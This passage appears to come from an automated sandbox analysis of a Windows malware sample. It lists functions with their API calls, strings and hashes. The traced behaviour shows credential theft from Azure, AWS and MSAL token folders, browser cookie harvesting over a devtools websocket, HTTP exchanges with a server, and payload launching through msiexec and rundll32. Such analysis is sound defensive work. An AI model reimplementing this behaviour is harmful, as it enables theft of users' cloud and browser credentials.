                              • Part of subcall function 00E4C920: lstrcat.KERNEL32(?,00E60B4B), ref: 00E4CA57
                              • Part of subcall function 00E4C920: lstrcat.KERNEL32(?,00E60B4E), ref: 00E4CA78
                            • lstrlen.KERNEL32(00000000), ref: 00E4CF44
                            • CloseHandle.KERNEL32(00000000), ref: 00E4CF9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: bfee8fa10155121ecbe00642a83abb89a747a2d390f2f482fc00a89fb8133b1a
                            • Instruction ID: 59b68a8577b659172babada840d84729d8b1e154e769c4b9709e755619130548
                            • Opcode Fuzzy Hash: bfee8fa10155121ecbe00642a83abb89a747a2d390f2f482fc00a89fb8133b1a
                            • Instruction Fuzzy Hash: 0DE11171910108ABCB18EBA4DDA1FEEB7B9AF14301F0456A9F51673191EF306A4DCFA1
                            Function 00E584B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            • RegOpenKeyExA.ADVAPI32(00000000,009CBE20,00000000,00020019,00000000,00E605BE), ref: 00E58534
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E585B6
                            • wsprintfA.USER32 ref: 00E585E9
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E5860B
                            • RegCloseKey.ADVAPI32(00000000), ref: 00E5861C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00E58629
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 3246050789-3278919252
                            • Opcode ID: e7e909033639644f257f8120c6742a50cdd1abd40d9ec79450369763fa86e605
                            • Instruction ID: d4db532b064ef40b45d21c28ffe0ddf87fe02013c15257ca96ab730ee04ef930
                            • Opcode Fuzzy Hash: e7e909033639644f257f8120c6742a50cdd1abd40d9ec79450369763fa86e605
                            • Instruction Fuzzy Hash: 07812A7191011CABDB28DB54CD91FEAB7B8BF08301F1486E9E509B6180DF706B88CFA0
                            Function 00E591A0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184COMMON
                            Download Yara Rule
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E591FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: `d$`d$image/jpeg
                            • API String ID: 2244384528-3402243820
                            • Opcode ID: c8d6d2358ffcad7eb67af60672eac32f19d9f9e7ae77c3e7213c61aafa26aeb6
                            • Instruction ID: b5ac48b0ba7e9c73affe2fdba154b1ed16c4f53e53a1e40796dc00dd992c2f09
                            • Opcode Fuzzy Hash: c8d6d2358ffcad7eb67af60672eac32f19d9f9e7ae77c3e7213c61aafa26aeb6
                            • Instruction Fuzzy Hash: CC71FB75A10208EBDB18DFE4D989FEEB7B9BF48301F108558F916A7284DB34A944CB60
                            Function 00E54FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E58F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E58F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 00E55000
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00E5501D
                              • Part of subcall function 00E54B60: wsprintfA.USER32 ref: 00E54B7C
                              • Part of subcall function 00E54B60: FindFirstFileA.KERNEL32(?,?), ref: 00E54B93
                            • lstrcat.KERNEL32(?,00000000), ref: 00E5508C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00E550A9
                              • Part of subcall function 00E54B60: StrCmpCA.SHLWAPI(?,00E60FC4), ref: 00E54BC1
                              • Part of subcall function 00E54B60: StrCmpCA.SHLWAPI(?,00E60FC8), ref: 00E54BD7
                              • Part of subcall function 00E54B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00E54DCD
                              • Part of subcall function 00E54B60: FindClose.KERNEL32(000000FF), ref: 00E54DE2
                            • lstrcat.KERNEL32(?,00000000), ref: 00E55118
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00E55135
                              • Part of subcall function 00E54B60: wsprintfA.USER32 ref: 00E54C00
                              • Part of subcall function 00E54B60: StrCmpCA.SHLWAPI(?,00E608D3), ref: 00E54C15
                              • Part of subcall function 00E54B60: wsprintfA.USER32 ref: 00E54C32
                              • Part of subcall function 00E54B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00E54C6E
                              • Part of subcall function 00E54B60: lstrcat.KERNEL32(?,009CF320), ref: 00E54C9A
                              • Part of subcall function 00E54B60: lstrcat.KERNEL32(?,00E60FE0), ref: 00E54CAC
                              • Part of subcall function 00E54B60: lstrcat.KERNEL32(?,?), ref: 00E54CC0
                              • Part of subcall function 00E54B60: lstrcat.KERNEL32(?,00E60FE4), ref: 00E54CD2
                              • Part of subcall function 00E54B60: lstrcat.KERNEL32(?,?), ref: 00E54CE6
                              • Part of subcall function 00E54B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00E54CFC
                              • Part of subcall function 00E54B60: DeleteFileA.KERNEL32(?), ref: 00E54D81
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: 1fc7d27f7c74bab5bbec5fcc8e97c8e4e7fa12582663a9c8f12923e2f498d19c
                            • Instruction ID: 53fae3f87a1b1dd2e6c85a98bdff00ddcc1cb0d914574ed24869df546b41667a
                            • Opcode Fuzzy Hash: 1fc7d27f7c74bab5bbec5fcc8e97c8e4e7fa12582663a9c8f12923e2f498d19c
                            • Instruction Fuzzy Hash: 4041D3BAA8030867DB64E770EC47FDD73385B64741F0059A4B689B20C1EEB457CC8B92
                            Function 00E53080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00E53415
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00E535AD
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00E5373A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: 80217119d2511722aad65654008fc00967744b40acacdf656971229ccc068f3d
                            • Instruction ID: 8a3187651caa14958b4c43b8585f29d071ef91d3731222003349780e6be4ba99
                            • Opcode Fuzzy Hash: 80217119d2511722aad65654008fc00967744b40acacdf656971229ccc068f3d
                            • Instruction Fuzzy Hash: 8A1221719101189BCB14EBA0DD62FEEB7B9AF14301F045AA9F90676191EF702B4DCFA1
                            Function 00E49BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E49A50: InternetOpenA.WININET(00E60AF6,00000001,00000000,00000000,00000000), ref: 00E49A6A
                            • lstrcat.KERNEL32(?,cookies), ref: 00E49CAF
                            • lstrcat.KERNEL32(?,00E612C4), ref: 00E49CC1
                            • lstrcat.KERNEL32(?,?), ref: 00E49CD5
                            • lstrcat.KERNEL32(?,00E612C8), ref: 00E49CE7
                            • lstrcat.KERNEL32(?,?), ref: 00E49CFB
                            • lstrcat.KERNEL32(?,.txt), ref: 00E49D0D
                            • lstrlen.KERNEL32(00000000), ref: 00E49D17
                            • lstrlen.KERNEL32(00000000), ref: 00E49D26
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                            • API String ID: 3174675846-3542011879
                            • Opcode ID: b9b5ac24a1f37698063c3de1dd65b1ed5ad5c47684c51f1ea3cd0d5820be0b3a
                            • Instruction ID: 5881798d4f947da5c68fa5c6272a9fbdd7c05a8f180dc1a5227625b0e5d280e2
                            • Opcode Fuzzy Hash: b9b5ac24a1f37698063c3de1dd65b1ed5ad5c47684c51f1ea3cd0d5820be0b3a
                            • Instruction Fuzzy Hash: 3F518F71810608ABCB14EBE0EDA5FEEB378AB14301F405598F119B71D5EF70AA89CF61
                            Function 00E55510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                              • Part of subcall function 00E462D0: InternetOpenA.WININET(00E60DFF,00000001,00000000,00000000,00000000), ref: 00E46331
                              • Part of subcall function 00E462D0: StrCmpCA.SHLWAPI(?,009CF3B0), ref: 00E46353
                              • Part of subcall function 00E462D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E46385
                              • Part of subcall function 00E462D0: HttpOpenRequestA.WININET(00000000,GET,?,009CE8D8,00000000,00000000,00400100,00000000), ref: 00E463D5
                              • Part of subcall function 00E462D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E4640F
                              • Part of subcall function 00E462D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E46421
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E55568
                            • lstrlen.KERNEL32(00000000), ref: 00E5557F
                              • Part of subcall function 00E58FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E58FE2
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00E555B4
                            • lstrlen.KERNEL32(00000000), ref: 00E555D3
                            • lstrlen.KERNEL32(00000000), ref: 00E555FE
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: 3ee71a9f91de0aa9cefa1f72b41015798a1ddbee859c1074cf904ce13d92d5e2
                            • Instruction ID: 104bacf0633feb4d2dddc8edb4159842cc0c295b01790cd4feff5e922250dc7b
                            • Opcode Fuzzy Hash: 3ee71a9f91de0aa9cefa1f72b41015798a1ddbee859c1074cf904ce13d92d5e2
                            • Instruction Fuzzy Hash: 96510E305101089BCF58FF60DDA6AED77B9AF14342F546968F80677592EF306B48CBA2
                            Function 00E51520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: f8d2bc1f74de717b1c0b09631485748c032cec9b081d1283e6872861bff6ea47
                            • Instruction ID: f91b6d92c4f3e8f0a0ce0f75cebad03b07f77ba4f52a196a63d980539b5bebb6
                            • Opcode Fuzzy Hash: f8d2bc1f74de717b1c0b09631485748c032cec9b081d1283e6872861bff6ea47
                            • Instruction Fuzzy Hash: A6C196B59002199BCB18EF60DC99FDE73B9AF54305F0459E8F809B7241DB70AA88CF91
                            Function 00E544D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E58F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E58F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 00E5453C
                            • lstrcat.KERNEL32(?,009CEE00), ref: 00E5455B
                            • lstrcat.KERNEL32(?,?), ref: 00E5456F
                            • lstrcat.KERNEL32(?,009CDBC8), ref: 00E54583
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E58F20: GetFileAttributesA.KERNEL32(00000000,?,00E41B94,?,?,00E6577C,?,?,00E60E22), ref: 00E58F2F
                              • Part of subcall function 00E4A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E4A489
                              • Part of subcall function 00E4A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E4A13C
                              • Part of subcall function 00E4A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E4A161
                              • Part of subcall function 00E4A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E4A181
                              • Part of subcall function 00E4A110: ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E4A1AA
                              • Part of subcall function 00E4A110: LocalFree.KERNEL32(00E4148F), ref: 00E4A1E0
                              • Part of subcall function 00E4A110: CloseHandle.KERNEL32(000000FF), ref: 00E4A1EA
                              • Part of subcall function 00E59550: GlobalAlloc.KERNEL32(00000000,-F,00E5462D), ref: 00E59563
                            • StrStrA.SHLWAPI(?,009CED40), ref: 00E54643
                            • GlobalFree.KERNEL32(?), ref: 00E54762
                              • Part of subcall function 00E4A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E4A23F
                              • Part of subcall function 00E4A210: LocalAlloc.KERNEL32(00000040,?,?,?,00E44F3E,00000000,?), ref: 00E4A251
                              • Part of subcall function 00E4A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E4A27A
                              • Part of subcall function 00E4A210: LocalFree.KERNEL32(?,?,?,?,00E44F3E,00000000,?), ref: 00E4A28F
                            • lstrcat.KERNEL32(?,00000000), ref: 00E546F3
                            • StrCmpCA.SHLWAPI(?,00E608D2), ref: 00E54710
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00E54722
                            • lstrcat.KERNEL32(00000000,?), ref: 00E54735
                            • lstrcat.KERNEL32(00000000,00E60FA0), ref: 00E54744
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
